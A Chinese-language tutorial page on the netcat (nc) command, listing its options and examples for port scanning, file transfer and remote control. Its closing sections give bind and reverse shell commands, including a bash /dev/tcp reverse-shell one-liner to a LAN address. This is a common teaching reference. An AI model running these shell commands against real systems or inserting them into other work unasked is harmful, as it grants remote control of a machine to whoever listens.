投稿

nc

Aurora 入门教程 阅读 110

nc

nc是网络工具中的瑞士军刀

补充说明

nc命令 全称netcat,用于TCP、UDP或unix域套接字(uds)的数据流操作,它可以打开TCP连接,发送UDP数据包,监听任意TCP
和UDP端口,同时也可用作做端口扫描,支持IPv4和IPv6,与Telnet的不同在于nc可以编写脚本。

语法

nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>]
[-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]

选项

-4 只使用IPV4
-6 只使用IPV6
-c 使用tls连接或者监听
-D 启用socket调试开关
-g <网关> # 设置路由器跃程通信网关,最多可设置8个。
-G<指向器数目> # 设置来源路由指向器,其数值为4的倍数。
-h 在线帮助。
-i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口。
-l 使用监听模式,管控传入的资料。
-n 直接使用IP地址,而不通过域名服务器。
-o<输出文件> # 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
-p<通信端口> # 设置本地主机使用的通信端口。
-r 乱数指定本地与远端主机的通信端口。
-s<来源位址> # 设置本地主机送出数据包的IP地址。
-u 使用UDP传输协议。
-v 显示指令执行过程。
-w<超时秒数> # 设置等待连线的时间。
-z 使用0输入/输出模式,只在扫描通信端口时使用。

实例

TCP端口扫描

[root@localhost ~]# nc -v -z -w2 192.168.0.3 1-100 
192.168.0.3: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.3] 80 (http) open
(UNKNOWN) [192.168.0.3] 23 (telnet) open
(UNKNOWN) [192.168.0.3] 22 (ssh) open

扫描192.168.0.3 的端口 范围是 1-100
扫描UDP端口

[root@localhost ~]# nc -u -z -w2 192.168.0.3 1-1000  # 扫描192.168.0.3 的端口 范围是 1-1000

扫描指定端口

[root@localhost ~]# nc -nvv 192.168.0.1 80 # 扫描 80端口
(UNKNOWN) [192.168.0.1] 80 (?) open
y  //用户输入

查看从服务器到目的地的出站端口 443 是否被防火墙阻止

nc -vz acme-v02.api.letsencrypt.org 443 -w2
# Ncat: Version 7.50 ( https://nmap.org/ncat )
# Ncat: Connected to 23.77.214.183:443.
# Ncat: 0 bytes sent, 0 bytes received in 0.07 seconds.

文件传输

# 接收方提前设置监听端口与要接收的文件名(文件名可自定义):
nc -lp 8888 > node.tar.gz

# 传输方发文件:
nc -nv 192.168.75.121 8888  < node_exporter-1.3.1.linux-amd64.tar.gz
# ⚠️ 注意:192.168.75.121是接收方的ip地址。
# 如果希望文件传输结束后自动退出,可以使用下面的命令:
nc -lp 8888 > node.tar.gz
nc -nv 192.168.75.121 8888 -i 1 < node_exporter-1.3.1.linux-amd64.tar.gz
# ⚠️ 注意:-i 表示闲置超时时间

远程控制

# 正向控制,被控端主动设置监听端口及bash环境,控制端连接,如果有防火墙,需开放端口,否则会被拦截。
# 被控制端执行下面的命令:
nc -lvnp 8888 -c bash
# 控制端执行下面的命令:
nc 192.168.75.121 8888
# 反向控制,控制端设置监听端口,被控端主动连接控制端的ip及端口,并提供bash环境。
# 控制端执行下面的命令:
nc -lvnp 8888
# 被控制端执行下面的命令:
nc 192.168.75.121 8888 -c bash

反弹shell

# 控制端执行下面的命令:
nc -lvnp 8888
# 被控端执行下面的命令:
bash -i &> /dev/tcp/192.168.75.121/8888 0>&1

若文章对你有帮助,可以点赞或打赏支持我们。发布者:Aurora,转载请注明出处:http://61.174.243.28:13541/AY-knowledg-hub/nc/

(0)
AuroraAurora站点维系者
0 0 打赏 WeChat WeChat aliPay aliPay
上一篇 2024年 1月 10日 下午3:10
下一篇 2024年 1月 10日 下午3:12

相关推荐

  • HTML 图像  入门教程

    HTML 图像 

    文章目录HTML 图像- 图像标签( <img>)和源属性(Src)HTML 图像- Alt属性HTML 图像- 设置图像的高度与宽度基本的注意事项 – 有…

    lyh<span class="user-vip-flag"><span class="user-vip-flag-inner"><img class="user-vip-flag-icon j-lazy" src="http://61.174.243.28:13541/wp-content/uploads/2023/03/Vip1.svg" alt="会员" title="会员"></span></span> lyh会员
    2023年 4月 13日
  • Java String 类 入门教程

    Java String 类

    字符串广泛应用 在 Java 编程中,在 Java 中字符串属于对象,Java 提供了 String 类来创建和操作字符串。 文章目录创建字符串StringDemo.java 文件…

    lyh<span class="user-vip-flag"><span class="user-vip-flag-inner"><img class="user-vip-flag-icon j-lazy" src="http://61.174.243.28:13541/wp-content/uploads/2023/03/Vip1.svg" alt="会员" title="会员"></span></span> lyh会员
    2023年 3月 4日

  • gzip

    文章目录gzip补充说明语法选项参数实例 gzip 用来压缩文件 补充说明 gzip命令 用来压缩文件。gzip是个使用广泛的压缩程序,文件经它压缩过后,其名称后面会多处“.gz”…

    Aurora Aurora
    入门教程 2023年 12月 14日

  • ltrace

    文章目录ltrace补充说明语法选项实例 ltrace 用来跟踪进程调用库函数的情况 补充说明 ltrace命令 是用来跟踪进程调用库函数的情况。 语法 ltrace [optio…

    Aurora Aurora
    入门教程 2023年 12月 19日

  • ifup

    文章目录ifup补充说明语法参数实例 ifup 激活指定的网络接口 补充说明 ifup命令 用于激活指定的网络接口。 语法 ifup(参数) 参数 网络接口:要激活的网络接口。 实…

    Aurora Aurora
    入门教程 2023年 12月 19日

  • popd

    文章目录popd概要主要用途选项参数返回值例子注意参考链接 popd 从目录堆栈中删除目录。 概要 popd [-n] [+N | -N] 主要用途 从目录堆栈中删除目录,如果是顶…

    Aurora Aurora
    入门教程 2024年 3月 1日

  • sync

    文章目录sync补充说明语法选项buffer与cache sync 用于强制被改变的内容立刻写入磁盘 补充说明 sync命令 用于强制被改变的内容立刻写入磁盘,更新超块信息。 在L…

    Aurora Aurora
    入门教程 2024年 3月 11日

  • ftpwho

    文章目录ftpwho补充说明语法选项 ftpwho 显示当前每个ftp会话信息 补充说明 ftpwho命令 ftp服务器套件proftpd的工作指令,用于显示当前每个ftp会话信息…

    Aurora Aurora
    入门教程 2023年 12月 14日
  • linux 字符界面浏览器 w3m 入门教程

    linux 字符界面浏览器 w3m

    文章目录使用背景常用操作用快捷键页面操作超链接操作文件/流 操作缓存操作缓存选择模式(也就是按了s以後)书签操作搜索标记杂项行编辑模式 使用背景 linux无UI界面情况下,使用这…

    Aurora Aurora
    2023年 2月 17日

  • restorecon

    文章目录restorecon补充说明语法选项实例 restorecon 恢复文件的安全上下文 补充说明 restorecon命令 用来恢复SELinux文件属性即恢复文件的安全上下…

    Aurora Aurora
    入门教程 2024年 3月 4日

发表回复

登录后才能评论
Translate »